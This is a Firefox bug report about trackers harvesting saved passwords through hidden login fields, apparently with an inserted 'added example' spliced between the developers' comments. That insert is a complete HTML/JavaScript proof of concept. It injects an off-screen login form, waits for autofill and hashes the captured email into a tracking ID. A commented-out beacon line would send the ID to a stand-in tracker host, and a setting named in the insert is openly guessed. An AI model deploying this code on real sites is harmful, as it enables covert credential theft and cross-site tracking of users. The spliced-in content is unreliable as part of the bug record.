Closed Bug 1443083 Opened 7 years ago Closed 7 years ago

sniffing Passwords with hidden login fields/scripts

Categories

(Toolkit :: Password Manager, defect)

58 Branch
defect
Not set
normal

Tracking


RESOLVED DUPLICATE of bug 1427543

People

(Reporter: christoph.suter, Unassigned)

Details

User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0
Build ID: 20180206200532

Steps to reproduce:

Go to this site: https://senglehardt.com/demo/no_boundaries/loginmanager/
Create a fake email and password, save it to the Firefox Password Manager and proceed. The next site presents you the email and password you just typed. --> Security risk, possible to track, uniquely identifies persons.

Actual results:

It worked and my password was sniffed without me interacting with the site.

Expected results:

The 2nd page should not have been able to sniff my passwords automatically. The browser should warn me about the hidden login field/script and ask what to do: log in, or block the script from sniffing.
NI :dveditz, :dbaron because this sounds similar to bug 1440786.
Flags: needinfo?(dveditz)
Flags: needinfo?(dbaron)
This is different from "css keylogging" (which only affects sites using a common JS library that reflects field values back into the DOM, and is arguably a problem created by those libraries). This is based on a report from December https://freedom-to-tinker.com/2017/12/27/no-boundaries-for-user-identities-web-trackers-exploit-browser-login-managers/ We should have a bug on that somewhere but I couldn't find it. We have a setting that defeats this (added in bug 359675 but not the default). We've recently had meetings with the password manager team where this came up so I'm quite surprised I can't find the relevant bug.
Component: Untriaged → Password Manager
Flags: needinfo?(dveditz)
Flags: needinfo?(dbaron)
Product: Firefox → Toolkit
Whiteboard: DUPE me
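The mechanism the reporter and the linked freedom-to-tinker article describe, written out as an added example. This is not the senglehardt.com demo page and not Firefox or Mozilla code; the inline script stands in for a third-party tracking script that the first-party site embeds, and the field names, the hashing of the email into a tracking identifier and the commented-out /collect endpoint are assumptions made for the demo. The important precondition is visible in the reporter's steps: the password manager only fills credentials for the origin where they were saved, so the script must run on a site where the user has already saved a login, which is exactly what a tracker embedded by that site gets.

```html
<!doctype html>
<html>
<head>
<meta charset="utf-8">
<title>Hidden login form demo (added example)</title>
</head>
<body>
<p>Nothing visible on this page asks for credentials.</p>

<!-- Stand-in for a third-party tracking script embedded by the first-party
     site. Added example, not the senglehardt.com demo or Mozilla code; the
     field names and the /collect endpoint are assumed. -->
<script>
(function trackerScript() {
  // 1. Inject a login form the user can never see. Pushing it off-screen
  //    (rather than display:none) keeps the fields eligible for autofill.
  const form = document.createElement('form');
  form.style.cssText = 'position:absolute;left:-10000px;top:-10000px;';
  const user = document.createElement('input');
  user.type = 'email';
  user.name = 'email';
  user.autocomplete = 'username';
  const pass = document.createElement('input');
  pass.type = 'password';
  pass.name = 'password';
  pass.autocomplete = 'current-password';
  form.append(user, pass);
  document.body.appendChild(form);

  // 2. Wait for the browser's password manager to fill the fields. A manager
  //    that fills on page load does so with no user interaction at all.
  const poll = setInterval(async () => {
    if (!user.value) return;
    clearInterval(poll);

    // 3. Turn the autofilled email into a stable cross-site identifier.
    //    SHA-256 via SubtleCrypto needs a secure context (https or localhost).
    const bytes = new TextEncoder().encode(user.value.trim().toLowerCase());
    const digest = await crypto.subtle.digest('SHA-256', bytes);
    const id = Array.from(new Uint8Array(digest), b => b.toString(16).padStart(2, '0')).join('');

    // 4. A real tracker would beacon the id (and could send the password too)
    //    to its own origin. Here the harvest is only written to the page.
    const out = document.createElement('pre');
    out.textContent =
      `autofilled email: ${user.value}\n` +
      `password captured: ${pass.value.length} characters\n` +
      `tracking id (sha256 of email): ${id}`;
    document.body.appendChild(out);
    // navigator.sendBeacon('https://tracker.example/collect', id); // assumed endpoint
  }, 500);
})();
</script>
</body>
</html>
```

To reproduce the reporter's flow, serve this page from the same origin as a page with a visible login form, save a login on that first page, then load this one: a browser that autofills saved logins on page load fills the invisible fields and the harvest appears within a second, with no click from the user. Browsers that wait for a user gesture before filling a password field will not trigger it. The setting dveditz mentions as defeating this in Firefox is, on my assumption, the about:config pref signon.autofillForms; with it set to false the fields stay empty until the user picks a login from the dropdown, which is the interaction the reporter expected to be required.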
(In reply to Daniel Veditz [:dveditz] from comment #2) > We should have a bug on that somewhere but I couldn't find it. Ah, found it. Thank you.
Status: UNCONFIRMED → RESOLVED
Closed: 7 years ago
OS: Unspecified → All
Hardware: Unspecified → All
Resolution: --- → DUPLICATE
Whiteboard: DUPE me